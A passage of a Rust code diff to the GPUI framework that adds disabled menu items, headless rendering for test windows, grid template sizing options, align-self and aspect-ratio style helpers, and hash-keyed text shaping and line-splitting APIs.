os_action,
checked,
+ disabled,
} => OwnedMenuItem::Action {
name: name.clone(),
action: action.boxed_clone(),
os_action: *os_action,
checked: *checked,
+ disabled: *disabled,
},
OwnedMenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.clone()),
}
@@ -287,3 +357,70 @@ pub(crate) fn init_app_menus(platform: &dyn Platform, cx: &App) {
}
}));
}
+
+#[cfg(test)]
+mod tests {
+ use crate::Menu;
+
+ #[test]
+ fn test_menu() {
+ let menu = Menu::new("App")
+ .items(vec![
+ crate::MenuItem::action("Action 1", gpui::NoAction),
+ crate::MenuItem::separator(),
+ ])
+ .disabled(true);
+
+ assert_eq!(menu.name.as_ref(), "App");
+ assert_eq!(menu.items.len(), 2);
+ assert!(menu.disabled);
+ }
+
+ #[test]
+ fn test_menu_item_builder() {
+ use super::MenuItem;
+
+ let item = MenuItem::action("Test Action", gpui::NoAction);
+ assert_eq!(
+ match &item {
+ MenuItem::Action { name, .. } => name.as_ref(),
+ _ => unreachable!(),
+ },
+ "Test Action"
+ );
+ assert!(matches!(
+ item,
+ MenuItem::Action {
+ checked: false,
+ disabled: false,
+ ..
+ }
+ ));
+
+ assert!(
+ MenuItem::action("Test Action", gpui::NoAction)
+ .checked(true)
+ .is_checked()
+ );
+ assert!(
+ MenuItem::action("Test Action", gpui::NoAction)
+ .disabled(true)
+ .is_disabled()
+ );
+
+ let submenu = MenuItem::submenu(super::Menu {
+ name: "Submenu".into(),
+ items: vec![],
+ disabled: true,
+ });
+ assert_eq!(
+ match &submenu {
+ MenuItem::Submenu(menu) => menu.name.as_ref(),
+ _ => unreachable!(),
+ },
+ "Submenu"
+ );
+ assert!(!submenu.is_checked());
+ assert!(submenu.is_disabled());
+ }
+}
@@ -30,11 +30,12 @@ impl TestDispatcher {
.map_or(false, |var| var == "1" || var == "true"),
timeout_ticks: 0..=1000,
}));
+ Self::from_scheduler(scheduler)
+ }
- let session_id = scheduler.allocate_session_id();
-
+ pub fn from_scheduler(scheduler: Arc<TestScheduler>) -> Self {
TestDispatcher {
- session_id,
+ session_id: scheduler.allocate_session_id(),
scheduler,
num_cpus_override: Arc::new(AtomicUsize::new(0)),
}
@@ -76,6 +77,14 @@ impl TestDispatcher {
while self.tick(false) {}
}
+ pub fn allow_parking(&self) {
+ self.scheduler.allow_parking();
+ }
+
+ pub fn forbid_parking(&self) {
+ self.scheduler.forbid_parking();
+ }
+
/// Override the value returned by `BackgroundExecutor::num_cpus()` in tests.
/// A value of 0 means no override (the default of 4 is used).
pub fn set_num_cpus(&self, count: usize) {
@@ -1,9 +1,9 @@
use crate::{
AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DevicePixels,
DummyKeyboardMapper, ForegroundExecutor, Keymap, NoopTextSystem, Platform, PlatformDisplay,
- PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, PromptButton,
- ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, Task,
- TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size,
+ PlatformHeadlessRenderer, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem,
+ PromptButton, ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata,
+ Task, TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size,
};
use anyhow::Result;
use collections::VecDeque;
@@ -34,6 +34,7 @@ pub(crate) struct TestPlatform {
pub opened_url: RefCell<Option<String>>,
pub text_system: Arc<dyn PlatformTextSystem>,
pub expect_restart: RefCell<Option<oneshot::Sender<Option<PathBuf>>>>,
+ headless_renderer_factory: Option<Box<dyn Fn() -> Option<Box<dyn PlatformHeadlessRenderer>>>>,
weak: Weak<Self>,
}
@@ -88,8 +89,30 @@ pub(crate) struct TestPrompts {
impl TestPlatform {
pub fn new(executor: BackgroundExecutor, foreground_executor: ForegroundExecutor) -> Rc<Self> {
- let text_system = Arc::new(NoopTextSystem);
-
+ Self::with_platform(
+ executor,
+ foreground_executor,
+ Arc::new(NoopTextSystem),
+ None,
+ )
+ }
+
+ pub fn with_text_system(
+ executor: BackgroundExecutor,
+ foreground_executor: ForegroundExecutor,
+ text_system: Arc<dyn PlatformTextSystem>,
+ ) -> Rc<Self> {
+ Self::with_platform(executor, foreground_executor, text_system, None)
+ }
+
+ pub fn with_platform(
+ executor: BackgroundExecutor,
+ foreground_executor: ForegroundExecutor,
+ text_system: Arc<dyn PlatformTextSystem>,
+ headless_renderer_factory: Option<
+ Box<dyn Fn() -> Option<Box<dyn PlatformHeadlessRenderer>>>,
+ >,
+ ) -> Rc<Self> {
Rc::new_cyclic(|weak| TestPlatform {
background_executor: executor,
foreground_executor,
@@ -107,6 +130,7 @@ impl TestPlatform {
weak: weak.clone(),
opened_url: Default::default(),
text_system,
+ headless_renderer_factory,
})
}
@@ -299,11 +323,13 @@ impl Platform for TestPlatform {
handle: AnyWindowHandle,
params: WindowParams,
) -> anyhow::Result<Box<dyn crate::PlatformWindow>> {
+ let renderer = self.headless_renderer_factory.as_ref().and_then(|f| f());
let window = TestWindow::new(
handle,
params,
self.weak.clone(),
self.active_display.clone(),
+ renderer,
);
Ok(Box::new(window))
}
@@ -1,10 +1,12 @@
use crate::{
- AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DispatchEventResult, GpuSpecs,
- Pixels, PlatformAtlas, PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow,
- Point, PromptButton, RequestFrameOptions, Size, TestPlatform, TileId, WindowAppearance,
+ AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DevicePixels,
+ DispatchEventResult, GpuSpecs, Pixels, PlatformAtlas, PlatformDisplay,
+ PlatformHeadlessRenderer, PlatformInput, PlatformInputHandler, PlatformWindow, Point,
+ PromptButton, RequestFrameOptions, Scene, Size, TestPlatform, TileId, WindowAppearance,
WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowParams,
};
use collections::HashMap;
+use image::RgbaImage;
use parking_lot::Mutex;
use raw_window_handle::{HasDisplayHandle, HasWindowHandle};
use std::{
@@ -21,6 +23,7 @@ pub(crate) struct TestWindowState {
platform: Weak<TestPlatform>,
// TODO: Replace with `Rc`
sprite_atlas: Arc<dyn PlatformAtlas>,
+ renderer: Option<Box<dyn PlatformHeadlessRenderer>>,
pub(crate) should_close_handler: Option<Box<dyn FnMut() -> bool>>,
hit_test_window_control_callback: Option<Box<dyn FnMut() -> Option<WindowControlArea>>>,
input_callback: Option<Box<dyn FnMut(PlatformInput) -> DispatchEventResult>>,
@@ -57,13 +60,19 @@ impl TestWindow {
params: WindowParams,
platform: Weak<TestPlatform>,
display: Rc<dyn PlatformDisplay>,
+ renderer: Option<Box<dyn PlatformHeadlessRenderer>>,
) -> Self {
+ let sprite_atlas: Arc<dyn PlatformAtlas> = match &renderer {
+ Some(r) => r.sprite_atlas(),
+ None => Arc::new(TestAtlas::new()),
+ };
Self(Rc::new(Mutex::new(TestWindowState {
bounds: params.bounds,
display,
platform,
handle,
- sprite_atlas: Arc::new(TestAtlas::new()),
+ sprite_atlas,
+ renderer,
title: Default::default(),
edited: false,
should_close_handler: None,
@@ -81,10 +90,11 @@ impl TestWindow {
pub fn simulate_resize(&mut self, size: Size<Pixels>) {
let scale_factor = self.scale_factor();
let mut lock = self.0.lock();
+ // Always update bounds, even if no callback is registered
+ lock.bounds.size = size;
let Some(mut callback) = lock.resize_callback.take() else {
return;
};
- lock.bounds.size = size;
drop(lock);
callback(size, scale_factor);
self.0.lock().resize_callback = Some(callback);
@@ -275,12 +285,25 @@ impl PlatformWindow for TestWindow {
fn on_appearance_changed(&self, _callback: Box<dyn FnMut()>) {}
- fn draw(&self, _scene: &crate::Scene) {}
+ fn draw(&self, _scene: &Scene) {}
fn sprite_atlas(&self) -> sync::Arc<dyn crate::PlatformAtlas> {
self.0.lock().sprite_atlas.clone()
}
+ #[cfg(any(test, feature = "test-support"))]
+ fn render_to_image(&self, scene: &Scene) -> anyhow::Result<RgbaImage> {
+ let mut state = self.0.lock();
+ let size = state.bounds.size;
+ if let Some(renderer) = &mut state.renderer {
+ let scale_factor = 2.0;
+ let device_size: Size<DevicePixels> = size.to_device_pixels(scale_factor);
+ renderer.render_scene_to_image(scene, device_size)
+ } else {
+ anyhow::bail!("render_to_image not available: no HeadlessRenderer configured")
+ }
+ }
+
fn as_test(&mut self) -> Option<&mut TestWindow> {
Some(self)
}
@@ -169,7 +169,7 @@ pub struct ThreadTimingsDelta {
#[doc(hidden)]
pub struct ProfilingCollector {
startup_time: Instant,
- cursors: HashMap<u64, u64>,
+ cursors: HashMap<ThreadId, u64>,
}
impl ProfilingCollector {
@@ -195,7 +195,7 @@ impl ProfilingCollector {
thread.thread_id.hash(&mut hasher);
let hashed_id = hasher.finish();
- let prev_cursor = self.cursors.get(&hashed_id).copied().unwrap_or(0);
+ let prev_cursor = self.cursors.get(&thread.thread_id).copied().unwrap_or(0);
let buffer_len = thread.timings.len() as u64;
let buffer_start = thread.total_pushed.saturating_sub(buffer_len);
@@ -205,7 +205,7 @@ impl ProfilingCollector {
thread.timings.as_slice()
} else {
let skip = (prev_cursor - buffer_start) as usize;
- &thread.timings[skip..]
+ &thread.timings[skip.min(thread.timings.len())..]
};
// Don't emit the last entry if it's still in-progress (end: None).
@@ -215,12 +215,12 @@ impl ProfilingCollector {
}
let cursor_advance = if incomplete_at_end {
- thread.total_pushed - 1
+ thread.total_pushed.saturating_sub(1)
} else {
thread.total_pushed
};
- self.cursors.insert(hashed_id, cursor_advance);
+ self.cursors.insert(thread.thread_id, cursor_advance);
if slice.is_empty() {
continue;
@@ -657,7 +657,7 @@ impl Default for TransformationMatrix {
#[expect(missing_docs)]
pub struct MonochromeSprite {
pub order: DrawOrder,
- pub pad: u32, // align to 8 bytes
+ pub pad: u32,
pub bounds: Bounds<ScaledPixels>,
pub content_mask: ContentMask<ScaledPixels>,
pub color: Hsla,
@@ -695,7 +695,7 @@ impl From<SubpixelSprite> for Primitive {
#[expect(missing_docs)]
pub struct PolychromeSprite {
pub order: DrawOrder,
- pub pad: u32, // align to 8 bytes
+ pub pad: u32,
pub grayscale: bool,
pub opacity: f32,
pub bounds: Bounds<ScaledPixels>,
@@ -138,6 +138,42 @@ impl ObjectFit {
}
}
+/// The minimum size of a column or row in a grid layout
+#[derive(
+ Copy, Clone, PartialEq, Eq, PartialOrd, Ord, Debug, Default, JsonSchema, Serialize, Deserialize,
+)]
+pub enum TemplateColumnMinSize {
+ /// The column size may be 0
+ #[default]
+ Zero,
+    /// The column's minimum size is its min-content size
+ MinContent,
+ /// The column size can be determined by the max content
+ MaxContent,
+}
+
+/// A simplified representation of the grid-template-* value
+#[derive(
+ Copy,
+ Clone,
+ Refineable,
+ PartialEq,
+ Eq,
+ PartialOrd,
+ Ord,
+ Debug,
+ Default,
+ JsonSchema,
+ Serialize,
+ Deserialize,
+)]
+pub struct GridTemplate {
+ /// How this template directive should be repeated
+ pub repeat: u16,
+    /// The minimum track size used in the generated repeat(<count>, minmax(..)) expression
+ pub min_size: TemplateColumnMinSize,
+}
+
/// The CSS styling that can be applied to an element via the `Styled` trait
#[derive(Clone, Refineable, Debug)]
#[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)]
@@ -262,16 +298,12 @@ pub struct Style {
pub opacity: Option<f32>,
/// The grid columns of this element
- /// Equivalent to the Tailwind `grid-cols-<number>`
- pub grid_cols: Option<u16>,
-
- /// The grid columns with min-content minimum sizing.
- /// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints.
- pub grid_cols_min_content: Option<u16>,
+ /// Roughly equivalent to the Tailwind `grid-cols-<number>`
+ pub grid_cols: Option<GridTemplate>,
/// The row span of this element
/// Equivalent to the Tailwind `grid-rows-<number>`
- pub grid_rows: Option<u16>,
+ pub grid_rows: Option<GridTemplate>,
/// The grid location of this element
pub grid_location: Option<GridLocation>,
@@ -790,7 +822,6 @@ impl Default for Style {
opacity: None,
grid_rows: None,
grid_cols: None,
- grid_cols_min_content: None,
grid_location: None,
#[cfg(debug_assertions)]
@@ -1,9 +1,9 @@
use crate::{
- self as gpui, AbsoluteLength, AlignContent, AlignItems, BorderStyle, CursorStyle,
+ self as gpui, AbsoluteLength, AlignContent, AlignItems, AlignSelf, BorderStyle, CursorStyle,
DefiniteLength, Display, Fill, FlexDirection, FlexWrap, Font, FontFeatures, FontStyle,
- FontWeight, GridPlacement, Hsla, JustifyContent, Length, SharedString, StrikethroughStyle,
- StyleRefinement, TextAlign, TextOverflow, TextStyleRefinement, UnderlineStyle, WhiteSpace, px,
- relative, rems,
+ FontWeight, GridPlacement, GridTemplate, Hsla, JustifyContent, Length, SharedString,
+ StrikethroughStyle, StyleRefinement, TemplateColumnMinSize, TextAlign, TextOverflow,
+ TextStyleRefinement, UnderlineStyle, WhiteSpace, px, relative, rems,
};
pub use gpui_macros::{
border_style_methods, box_shadow_style_methods, cursor_style_methods, margin_style_methods,
@@ -278,6 +278,55 @@ pub trait Styled: Sized {
self
}
+    /// Sets this element to align against the start of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#start)
+ fn self_start(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Start);
+ self
+ }
+
+ /// Sets this element to align against the end of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#end)
+ fn self_end(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::End);
+ self
+ }
+
+ /// Sets this element to align against the start of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#start)
+ fn self_flex_start(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::FlexStart);
+ self
+ }
+
+ /// Sets this element to align against the end of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#end)
+ fn self_flex_end(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::FlexEnd);
+ self
+ }
+
+ /// Sets this element to align along the center of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#center)
+ fn self_center(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Center);
+ self
+ }
+
+ /// Sets this element to align along the baseline of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#baseline)
+ fn self_baseline(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Baseline);
+ self
+ }
+
+ /// Sets this element to stretch to fill the available space along the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#stretch)
+ fn self_stretch(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Stretch);
+ self
+ }
+
/// Sets the element to justify flex items against the start of the container's main axis.
/// [Docs](https://tailwindcss.com/docs/justify-content#start)
fn justify_start(mut self) -> Self {
@@ -384,6 +433,20 @@ pub trait Styled: Sized {
self
}
+ /// Sets the aspect ratio of the element.
+ /// [Docs](https://tailwindcss.com/docs/aspect-ratio)
+ fn aspect_ratio(mut self, ratio: f32) -> Self {
+ self.style().aspect_ratio = Some(ratio);
+ self
+ }
+
+ /// Sets the aspect ratio of the element to 1/1 – equal width and height.
+ /// [Docs](https://tailwindcss.com/docs/aspect-ratio)
+ fn aspect_square(mut self) -> Self {
+ self.style().aspect_ratio = Some(1.0);
+ self
+ }
+
/// Sets the background color of the element.
fn bg<F>(mut self, fill: F) -> Self
where
@@ -648,20 +711,38 @@ pub trait Styled: Sized {
/// Sets the grid columns of this element.
fn grid_cols(mut self, cols: u16) -> Self {
- self.style().grid_cols = Some(cols);
+ self.style().grid_cols = Some(GridTemplate {
+ repeat: cols,
+ min_size: TemplateColumnMinSize::Zero,
+ });
self
}
/// Sets the grid columns with min-content minimum sizing.
/// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints.
fn grid_cols_min_content(mut self, cols: u16) -> Self {
- self.style().grid_cols_min_content = Some(cols);
+ self.style().grid_cols = Some(GridTemplate {
+ repeat: cols,
+ min_size: TemplateColumnMinSize::MinContent,
+ });
+ self
+ }
+
+ /// Sets the grid columns with max-content maximum sizing for content-based column widths.
+ fn grid_cols_max_content(mut self, cols: u16) -> Self {
+ self.style().grid_cols = Some(GridTemplate {
+ repeat: cols,
+ min_size: TemplateColumnMinSize::MaxContent,
+ });
self
}
/// Sets the grid rows of this element.
fn grid_rows(mut self, rows: u16) -> Self {
- self.style().grid_rows = Some(rows);
+ self.style().grid_rows = Some(GridTemplate {
+ repeat: rows,
+ min_size: TemplateColumnMinSize::Zero,
+ });
self
}
@@ -1,6 +1,6 @@
use crate::{
- AbsoluteLength, App, Bounds, DefiniteLength, Edges, Length, Pixels, Point, Size, Style, Window,
- point, size,
+ AbsoluteLength, App, Bounds, DefiniteLength, Edges, GridTemplate, Length, Pixels, Point, Size,
+ Style, Window, point, size,
};
use collections::{FxHashMap, FxHashSet};
use stacksafe::{StackSafe, stacksafe};
@@ -8,7 +8,7 @@ use std::{fmt::Debug, ops::Range};
use taffy::{
TaffyTree, TraversePartialTree as _,
geometry::{Point as TaffyPoint, Rect as TaffyRect, Size as TaffySize},
- prelude::min_content,
+ prelude::{max_content, min_content},
style::AvailableSpace as TaffyAvailableSpace,
tree::NodeId,
};
@@ -308,19 +308,31 @@ impl ToTaffy<taffy::style::Style> for Style {
}
fn to_grid_repeat<T: taffy::style::CheapCloneStr>(
- unit: &Option<u16>,
+ unit: &Option<GridTemplate>,
) -> Vec<taffy::GridTemplateComponent<T>> {
- // grid-template-columns: repeat(<number>, minmax(0, 1fr));
- unit.map(|count| vec![repeat(count, vec![minmax(length(0.0), fr(1.0))])])
- .unwrap_or_default()
- }
-
- fn to_grid_repeat_min_content<T: taffy::style::CheapCloneStr>(
- unit: &Option<u16>,
- ) -> Vec<taffy::GridTemplateComponent<T>> {
- // grid-template-columns: repeat(<number>, minmax(min-content, 1fr));
- unit.map(|count| vec![repeat(count, vec![minmax(min_content(), fr(1.0))])])
- .unwrap_or_default()
+ unit.map(|template| {
+ match template.min_size {
+ // grid-template-*: repeat(<number>, minmax(0, 1fr));
+ crate::TemplateColumnMinSize::Zero => {
+ vec![repeat(template.repeat, vec![minmax(length(0.0), fr(1.0))])]
+ }
+ // grid-template-*: repeat(<number>, minmax(min-content, 1fr));
+ crate::TemplateColumnMinSize::MinContent => {
+ vec![repeat(
+ template.repeat,
+ vec![minmax(min_content(), fr(1.0))],
+ )]
+ }
+ // grid-template-*: repeat(<number>, minmax(0, max-content))
+ crate::TemplateColumnMinSize::MaxContent => {
+ vec![repeat(
+ template.repeat,
+ vec![minmax(length(0.0), max_content())],
+ )]
+ }
+ }
+ })
+ .unwrap_or_default()
}
taffy::style::Style {
@@ -347,11 +359,7 @@ impl ToTaffy<taffy::style::Style> for Style {
flex_grow: self.flex_grow,
flex_shrink: self.flex_shrink,
grid_template_rows: to_grid_repeat(&self.grid_rows),
- grid_template_columns: if self.grid_cols_min_content.is_some() {
- to_grid_repeat_min_content(&self.grid_cols_min_content)
- } else {
- to_grid_repeat(&self.grid_cols)
- },
+ grid_template_columns: to_grid_repeat(&self.grid_cols),
grid_row: self
.grid_location
.as_ref()
@@ -63,7 +63,8 @@ pub struct TextSystem {
}
impl TextSystem {
- pub(crate) fn new(platform_text_system: Arc<dyn PlatformTextSystem>) -> Self {
+ /// Create a new TextSystem with the given platform text system.
+ pub fn new(platform_text_system: Arc<dyn PlatformTextSystem>) -> Self {
TextSystem {
platform_text_system,
font_metrics: RwLock::default(),
@@ -372,7 +373,8 @@ pub struct WindowTextSystem {
}
impl WindowTextSystem {
- pub(crate) fn new(text_system: Arc<TextSystem>) -> Self {
+ /// Create a new WindowTextSystem with the given TextSystem.
+ pub fn new(text_system: Arc<TextSystem>) -> Self {
Self {
line_layout_cache: LineLayoutCache::new(text_system.platform_text_system.clone()),
text_system,
@@ -438,6 +440,74 @@ impl WindowTextSystem {
}
}
+ /// Shape the given line using a caller-provided content hash as the cache key.
+ ///
+ /// This enables cache hits without materializing a contiguous `SharedString` for the text.
+ /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ ///
+ /// Like [`Self::shape_line`], this must be used only for single-line text (no `\n`).
+ pub fn shape_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[TextRun],
+ force_width: Option<Pixels>,
+ materialize_text: impl FnOnce() -> SharedString,
+ ) -> ShapedLine {
+ let mut decoration_runs = SmallVec::<[DecorationRun; 32]>::new();
+ for run in runs {
+ if let Some(last_run) = decoration_runs.last_mut()
+ && last_run.color == run.color
+ && last_run.underline == run.underline
+ && last_run.strikethrough == run.strikethrough
+ && last_run.background_color == run.background_color
+ {
+ last_run.len += run.len as u32;
+ continue;
+ }
+ decoration_runs.push(DecorationRun {
+ len: run.len as u32,
+ color: run.color,
+ background_color: run.background_color,
+ underline: run.underline,
+ strikethrough: run.strikethrough,
+ });
+ }
+
+ let mut used_force_width = force_width;
+ let layout = self.layout_line_by_hash(
+ text_hash,
+ text_len,
+ font_size,
+ runs,
+ used_force_width,
+ || {
+ let text = materialize_text();
+ debug_assert!(
+ text.find('\n').is_none(),
+ "text argument should not contain newlines"
+ );
+ text
+ },
+ );
+
+ // We only materialize actual text on cache miss; on hit we avoid allocations.
+ // Since `ShapedLine` carries a `SharedString`, use an empty placeholder for hits.
+ // NOTE: Callers must not rely on `ShapedLine.text` for content when using this API.
+ let text: SharedString = SharedString::new_static("");
+
+ ShapedLine {
+ layout,
+ text,
+ decoration_runs,
+ }
+ }
+
/// Shape a multi line string of text, at the given font_size, for painting to the screen.
/// Subsets of the text can be styled independently with the `runs` parameter.
/// If `wrap_width` is provided, the line breaks will be adjusted to fit within the given width.
@@ -627,6 +697,130 @@ impl WindowTextSystem {
layout
}
+
+ /// Probe the line layout cache using a caller-provided content hash, without allocating.
+ ///
+ /// Returns `Some(layout)` if the layout is already cached in either the current frame
+ /// or the previous frame. Returns `None` if it is not cached.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn try_layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[TextRun],
+ force_width: Option<Pixels>,
+ ) -> Option<Arc<LineLayout>> {
+ let mut last_run = None::<&TextRun>;
+ let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default();
+ font_runs.clear();
+
+ for run in runs.iter() {
+ let decoration_changed = if let Some(last_run) = last_run
+ && last_run.color == run.color
+ && last_run.underline == run.underline
+ && last_run.strikethrough == run.strikethrough
+ // we do not consider differing background color relevant, as it does not affect glyphs
+ // && last_run.background_color == run.background_color
+ {
+ false
+ } else {
+ last_run = Some(run);
+ true
+ };
+
+ let font_id = self.resolve_font(&run.font);
+ if let Some(font_run) = font_runs.last_mut()
+ && font_id == font_run.font_id
+ && !decoration_changed
+ {
+ font_run.len += run.len;
+ } else {
+ font_runs.push(FontRun {
+ len: run.len,
+ font_id,
+ });
+ }
+ }
+
+ let layout = self.line_layout_cache.try_layout_line_by_hash(
+ text_hash,
+ text_len,
+ font_size,
+ &font_runs,
+ force_width,
+ );
+
+ self.font_runs_pool.lock().push(font_runs);
+
+ layout
+ }
+
+ /// Layout the given line of text using a caller-provided content hash as the cache key.
+ ///
+ /// This enables cache hits without materializing a contiguous `SharedString` for the text.
+ /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[TextRun],
+ force_width: Option<Pixels>,
+ materialize_text: impl FnOnce() -> SharedString,
+ ) -> Arc<LineLayout> {
+ let mut last_run = None::<&TextRun>;
+ let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default();
+ font_runs.clear();
+
+ for run in runs.iter() {
+ let decoration_changed = if let Some(last_run) = last_run
+ && last_run.color == run.color
+ && last_run.underline == run.underline
+ && last_run.strikethrough == run.strikethrough
+ // we do not consider differing background color relevant, as it does not affect glyphs
+ // && last_run.background_color == run.background_color
+ {
+ false
+ } else {
+ last_run = Some(run);
+ true
+ };
+
+ let font_id = self.resolve_font(&run.font);
+ if let Some(font_run) = font_runs.last_mut()
+ && font_id == font_run.font_id
+ && !decoration_changed
+ {
+ font_run.len += run.len;
+ } else {
+ font_runs.push(FontRun {
+ len: run.len,
+ font_id,
+ });
+ }
+ }
+
+ let layout = self.line_layout_cache.layout_line_by_hash(
+ text_hash,
+ text_len,
+ font_size,
+ &font_runs,
+ force_width,
+ materialize_text,
+ );
+
+ self.font_runs_pool.lock().push(font_runs);
+
+ layout
+ }
}
#[derive(Hash, Eq, PartialEq)]
@@ -802,6 +996,11 @@ impl TextRun {
#[repr(C)]
pub struct GlyphId(pub u32);
+/// Parameters for rendering a glyph, used as cache keys for raster bounds.
+///
+/// This struct identifies a specific glyph rendering configuration including
+/// font, size, subpixel positioning, and scale factor. It's used to look up
+/// cached raster bounds and sprite atlas entries.
#[derive(Clone, Debug, PartialEq)]
#[expect(missing_docs)]
pub struct RenderGlyphParams {
@@ -1,12 +1,24 @@
use crate::{
- App, Bounds, Half, Hsla, LineLayout, Pixels, Point, Result, SharedString, StrikethroughStyle,
- TextAlign, UnderlineStyle, Window, WrapBoundary, WrappedLineLayout, black, fill, point, px,
- size,
+ App, Bounds, DevicePixels, Half, Hsla, LineLayout, Pixels, Point, RenderGlyphParams, Result,
+ ShapedGlyph, ShapedRun, SharedString, StrikethroughStyle, TextAlign, UnderlineStyle, Window,
+ WrapBoundary, WrappedLineLayout, black, fill, point, px, size,
};
use derive_more::{Deref, DerefMut};
use smallvec::SmallVec;
use std::sync::Arc;
+/// Pre-computed glyph data for efficient painting without per-glyph cache lookups.
+///
+/// This is produced by `ShapedLine::compute_glyph_raster_data` during prepaint
+/// and consumed by `ShapedLine::paint_with_raster_data` during paint.
+#[derive(Clone, Debug)]
+pub struct GlyphRasterData {
+ /// The raster bounds for each glyph, in paint order.
+ pub bounds: Vec<Bounds<DevicePixels>>,
+ /// The render params for each glyph (needed for sprite atlas lookup).
+ pub params: Vec<RenderGlyphParams>,
+}
+
/// Set the text decoration for a run of text.
#[derive(Debug, Clone)]
pub struct DecorationRun {
@@ -44,6 +56,14 @@ impl ShapedLine {
self.layout.len
}
+ /// The width of the shaped line in pixels.
+ ///
+ /// This is the glyph advance width computed by the text shaping system and is useful for
+ /// incrementally advancing a "pen" when painting multiple fragments on the same row.
+ pub fn width(&self) -> Pixels {
+ self.layout.width
+ }
+
/// Override the len, useful if you're rendering text a
/// as text b (e.g. rendering invisibles).
pub fn with_len(mut self, len: usize) -> Self {
@@ -108,6 +128,120 @@ impl ShapedLine {
Ok(())
}
+
+ /// Split this shaped line at a byte index, returning `(prefix, suffix)`.
+ ///
+ /// - `prefix` contains glyphs for bytes `[0, byte_index)` with original positions.
+ /// Its width equals the x-advance up to the split point.
+ /// - `suffix` contains glyphs for bytes `[byte_index, len)` with positions
+ /// shifted left so the first glyph starts at x=0, and byte indices rebased to 0.
+ /// - Decoration runs are partitioned at the boundary; a run that straddles it is
+ /// split into two with adjusted lengths.
+ /// - `font_size`, `ascent`, and `descent` are copied to both halves.
+ pub fn split_at(&self, byte_index: usize) -> (ShapedLine, ShapedLine) {
+ let x_offset = self.layout.x_for_index(byte_index);
+
+ // Partition glyph runs. A single run may contribute glyphs to both halves.
+ let mut left_runs = Vec::new();
+ let mut right_runs = Vec::new();
+
+ for run in &self.layout.runs {
+ let split_pos = run.glyphs.partition_point(|g| g.index < byte_index);
+
+ if split_pos > 0 {
+ left_runs.push(ShapedRun {
+ font_id: run.font_id,
+ glyphs: run.glyphs[..split_pos].to_vec(),
+ });
+ }
+
+ if split_pos < run.glyphs.len() {
+ let right_glyphs = run.glyphs[split_pos..]
+ .iter()
+ .map(|g| ShapedGlyph {
+ id: g.id,
+ position: point(g.position.x - x_offset, g.position.y),
+ index: g.index - byte_index,
+ is_emoji: g.is_emoji,
+ })
+ .collect();
+ right_runs.push(ShapedRun {
+ font_id: run.font_id,
+ glyphs: right_glyphs,
+ });
+ }
+ }
+
+ // Partition decoration runs. A run straddling the boundary is split into two.
+ let mut left_decorations = SmallVec::new();
+ let mut right_decorations = SmallVec::new();
+ let mut decoration_offset = 0u32;
+ let split_point = byte_index as u32;
+
+ for decoration in &self.decoration_runs {
+ let run_end = decoration_offset + decoration.len;
+
+ if run_end <= split_point {
+ left_decorations.push(decoration.clone());
+ } else if decoration_offset >= split_point {
+ right_decorations.push(decoration.clone());
+ } else {
+ let left_len = split_point - decoration_offset;
+ let right_len = run_end - split_point;
+ left_decorations.push(DecorationRun {
+ len: left_len,
+ color: decoration.color,
+ background_color: decoration.background_color,
+ underline: decoration.underline,
+ strikethrough: decoration.strikethrough,
+ });
+ right_decorations.push(DecorationRun {
+ len: right_len,
+ color: decoration.color,
+ background_color: decoration.background_color,
+ underline: decoration.underline,
+ strikethrough: decoration.strikethrough,
+ });
+ }
+
+ decoration_offset = run_end;
+ }
+
+ // Split text
+ let left_text = SharedString::new(self.text[..byte_index].to_string());
+ let right_text = SharedString::new(self.text[byte_index..].to_string());
+
+ let left_width = x_offset;
+ let right_width = self.layout.width - left_width;
+
+ let left = ShapedLine {
+ layout: Arc::new(LineLayout {
